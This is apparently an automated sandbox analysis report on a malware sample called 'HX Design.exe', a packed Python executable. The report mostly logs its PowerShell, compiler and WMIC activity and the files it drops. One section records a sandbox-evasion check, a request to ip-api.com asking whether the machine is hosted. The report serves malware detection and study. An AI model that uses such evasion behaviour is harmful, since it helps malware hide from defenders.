Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7922	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1458	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7637	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1838	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2572
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2751
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3442

Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_decimal.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-fibers-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
